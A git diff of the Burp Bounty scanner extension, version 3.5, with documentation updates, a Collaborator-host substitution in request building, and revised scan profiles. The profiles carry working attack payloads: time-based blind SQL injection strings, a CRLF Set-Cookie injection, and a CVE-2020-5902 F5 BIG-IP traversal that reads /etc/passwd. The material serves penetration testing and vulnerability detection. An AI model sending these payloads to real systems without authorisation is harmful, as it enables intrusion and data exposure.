Version 3.5

BappDescription.html

@@ -0,0 +1,16 @@
+<p>This BurpSuite extension allows you, in a quick and simple way, to improve
+the active and passive BurpSuite scanner by means of personalized rules
+through a very intuitive graphical interface. Through an advanced search of
+patterns and an improvement of the payload to send, we can create our own
+issue profiles both in the active scanner and in the passive.</p>
+
+<p>* Usage manual: <a href="https://github.com/wagiro/BurpBounty/wiki/usage">Wiki</a>.</p>
+
+<p>* You can download profile from: <a href="https://github.com/wagiro/BurpBounty/tree/master/profiles">Github</a>.</p>
+
+<p>* Author's on Twitter: <a href="https://twitter.com/BurpBounty">@BurpBounty</a> <a href="https://twitter.com/egarme">@egarme</a></p>
+
+<p>* More information at: <a href="https://burpbounty.net">https://burpbounty.net</a></p>
+
+
+<p>* If you need more power, I invite you to try the new <b>Burp Bounty Pro</b>, which gives you more power and automation during your manual pentests.</p>

CHANGELOG.md

@@ -1,4 +1,13 @@
 ##  Changelog
+**3.5.0 20201001**
+* Fixed bug with Payload and Payload without encode match type 
+* Changed the default directory from user.dir to user.home
+* Added <payload> and <grep> variables for printing issue details in Advisory.
+* Fixed regex grep case sensitive
+* Better redirection performance
+* Fixed bug with Match And Replace
+
+
 **3.4.0 20200621**
 * Fixed bug with delete button on windows systems
 * Fixed bug with Java array

README.md

@@ -8,26 +8,36 @@
 
 # Burp Bounty - Scan Check Builder (BApp Store)
 
+This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.<br/>
+
 Download releases:
 
 * https://github.com/wagiro/BurpBounty/releases/
 
 
-This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.
 
+<br/>If you need more power, I invite you to try the new <b>Burp Bounty Pro</b>, which gives you more power and automation during your manual pentests.
+
+<br/>More information at: [https://burpbounty.net](https://burpbounty.net) and [Burp Bounty Pro vs Free](https://burpbounty.net/burp-bounty-pro-vs-free/). 
 
 
 ## Usage
 
-* Go to [Usage](https://github.com/wagiro/BurpBounty/wiki/usage) section.
+* Go to [Usage](https://github.com/wagiro/BurpBounty/wiki/usage) section or the slides of [Ekoparty Security Conference](https://burpbounty.net/burp-bounty-ekoparty-2020/).
 
 ## Profiles
 
-* Profiles from [egarme](https://twitter.com/egarme) in [Github](https://github.com/wagiro/BurpBounty/tree/master/profiles/)
-
-* Profiles from [Gocha](https://twitter.com/GochaOqradze) in their [Github](https://github.com/ghsec/BBProfiles)
+* Thanks to [Six2dez1](https://twitter.com/Six2dez1) for collect all of the Burp Bounty profiles and also share their own. You can find the collection [HERE](https://github.com/wagiro/BurpBounty/tree/master/profiles/)
+
+* Also thanks to: 
+
+	- [Gocha](https://twitter.com/GochaOqradze)
+	- [Sy3Omda](https://twitter.com/Sy3Omda) 
+	- [Syed](https://twitter.com/syed__umar) 
+	- [n00py1](https://twitter.com/n00py1)
+	- [legik](https://github.com/legik)
 
-* Profiles from [Sy3Omda](https://twitter.com/Sy3Omda) in their [Github](https://github.com/Sy3Omda/burp-bounty)
+All of them have contributed by sharing their Burp Bounty profiles
 
 
 ### For example videos please visit our youtube channel:
@@ -43,9 +53,3 @@ This Burp Suite extension allows you, in a quick and simple way, to improve the
 
 
 <br/>
-
-
-## Donations
-If you like this extension, you can collaborate to continue developing it and improve it faster:
-
-- Paypal - https://paypal.me/Burpbounty

profiles/AllowCredentials.bb

@@ -1 +1 @@
-[{"Name":"Access-Control-Allow-Credentials","Enabled":true,"Scanner":2,"Author":"n00py","UrlEncode":false,"Grep":["true,Or,Access-Control-Allow-Credentials: true"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Access-Control-Allow-Credentials: True","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"The application sets the Access-Control-Allow-Credentials: True HTTP header.  An attempt should be made to manipulate the origin to see if origins are being reflected into the response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
+[{"Name":"AllowCredentials","Enabled":true,"Scanner":2,"Author":"@n00py1","UrlEncode":false,"Grep":["true,Or,Access-Control-Allow-Credentials: true"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Access-Control-Allow-Credentials: True","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"The application sets the Access-Control-Allow-Credentials: True HTTP header.  An attempt should be made to manipulate the origin to see if origins are being reflected into the response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]

profiles/BlindSQLi-TimeBased.bb

@@ -1 +1 @@
-[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 12--","\u0027 and sleep 12","\u0027 and sleep 12 and \u00271\u0027\u003d\u00271","\u0027 and sleep(12) and \u00271\u0027\u003d\u00271","\u0027 and sleep(12)--","\u0027 and sleep(12)",";sleep(12)--","\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(12); #","\u0027 WAITFOR DELAY \u00270:0:12\u0027--","\u0027 WAITFOR DELAY \u00270:0:12\u0027","\u0027 SELECT pg_sleep(12);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"8","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
+[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 25--","\u0027 and sleep 25","\u0027 and sleep 25 and \u00271\u0027\u003d\u00271","\u0027 and sleep(25) and \u00271\u0027\u003d\u00271","\u0027 and sleep(25)--","\u0027 and sleep(25)",";sleep(25)--","\u0027 SELECT BENCHMARK(2500000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(25); #","\u0027 WAITFOR DELAY \u00270:0:25\u0027--","\u0027 WAITFOR DELAY \u00270:0:25\u0027","\u0027 SELECT pg_sleep(25);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"20","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]

profiles/CRLF-Attack.bb

@@ -1 +1 @@
-[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[" ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":3,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
+[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or, ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]

profiles/F5-BigIP_CVE-2020-5902.bb

@@ -1 +1 @@
-[{"Name":"F5-BigIP_CVE-2020-5902","Enabled":true,"Scanner":1,"Author":"@burpbounty","Payloads":["/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName\u003d/etc/passwd"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x:0"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"F5-BigIP_CVE-2020-5902","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"More info at: https://support.f5.com/csp/article/K52145254","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
+[{"Name":"F5-BigIP_CVE-2020-5902","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName\u003d/etc/passwd"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x:0"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"F5-BigIP_CVE-2020-5902","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"More info at: https://support.f5.com/csp/article/K52145254","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]

profiles/FireBase_API.bb

@@ -0,0 +1 @@
+[{"Name":"FireBase_API","Enabled":true,"Scanner":2,"Author":"@syed__umar","UrlEncode":false,"Grep":["true,Or,apiKey:\\s\"(.*?)\","],"Tags":["All","InformationDisclosure"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Firebase API Token leakage","IssueSeverity":"Medium","IssueConfidence":"Firm","IssueDetail":"The API key of Firebase was found present in the source code of the web application. As it is, it doesn\u0027t pose any threat to the application. \n\nBut, do try this POC: https://gist.github.com/Anon-Exploiter/5232869d84d01d0e90377410ef25f576\n\nHost the above .html file on a server/vps (don\u0027t try on localhost, sometimes DEVs allow localhost for their own servers) - If it works, that means there\u0027s no restriction and anyone can utilize the keys to query the database from any application.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"Restrict the firebase keys to the Web Application\u0027s URL/Host only\n\nReference: https://stackoverflow.com/questions/35418143/how-to-restrict-firebase-data-modifications","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]

profiles/tags.txt

@@ -1 +1,2 @@
 All
+InformationDisclosure

src/ActiveProfile.java

@@ -121,7 +121,7 @@ public boolean isCellEditable(int row, int column) {
         if (callbacks.loadExtensionSetting("filename") != null) {
             filename = callbacks.loadExtensionSetting("filename")+ File.separator;;
         } else {
-            filename = System.getProperty("user.dir")+ File.separator;;
+            filename = System.getProperty("user.home")+ File.separator;;
         }
         showHeaders(headers);
         showGrepsTable();

src/BappDescription.html

@@ -0,0 +1,16 @@
+<p>This BurpSuite extension allows you, in a quick and simple way, to improve
+the active and passive BurpSuite scanner by means of personalized rules
+through a very intuitive graphical interface. Through an advanced search of
+patterns and an improvement of the payload to send, we can create our own
+issue profiles both in the active scanner and in the passive.</p>
+
+<p>* Usage manual: <a href="https://github.com/wagiro/BurpBounty/wiki/usage">Wiki</a>.</p>
+
+<p>* You can download profile from: <a href="https://github.com/wagiro/BurpBounty/tree/master/profiles">Github</a>.</p>
+
+<p>* Author's on Twitter: <a href="https://twitter.com/BurpBounty">@BurpBounty</a> <a href="https://twitter.com/egarme">@egarme</a></p>
+
+<p>* More information at: <a href="https://burpbounty.net">https://burpbounty.net</a></p>
+
+
+<p>* If you need more power, I invite you to try the new <b>Burp Bounty Pro</b>, which gives you more power and automation during your manual pentests.</p>

src/BuildUnencodeRequest.java

@@ -12,7 +12,7 @@ public class BuildUnencodeRequest {
         this.helpers = helpers;
     }
 
-    byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte[] payload, List<Headers> headers) {
+    byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte[] payload, List<Headers> headers, String bchost) {
         byte[] canary = buildCanary(payload.length);
         byte[] request = iScannerInsertionPoint.buildRequest(canary);
         int canaryPos = findCanary(canary, request);
@@ -29,6 +29,9 @@ byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte
                         if (replace.contains("{PAYLOAD}")) {
                             replace = replace.replace("{PAYLOAD}", stringpayload);
                         }
+                        if (replace.contains("{BC}")) {
+                            replace = replace.replace("{BC}", bchost);
+                        }
                         if (headers.get(x).match.isEmpty()) {
                             tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n");
                         } else {
@@ -38,6 +41,9 @@ byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte
                         if (replace.contains("{PAYLOAD}")) {
                             replace = replace.replaceAll("\\{PAYLOAD\\}", stringpayload);
                         }
+                        if (replace.contains("{BC}")) {
+                            replace = replace.replaceAll("\\{BC\\}", bchost);
+                        }
                         if (headers.get(x).match.isEmpty()) {
                             tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n");
                         } else {
@@ -64,4 +70,4 @@ private int findCanary(byte[] canary, byte[] request) {
         int canaryPos = helpers.indexOf(request, canary, false, 0, request.length);
         return canaryPos;
     }
-}
+}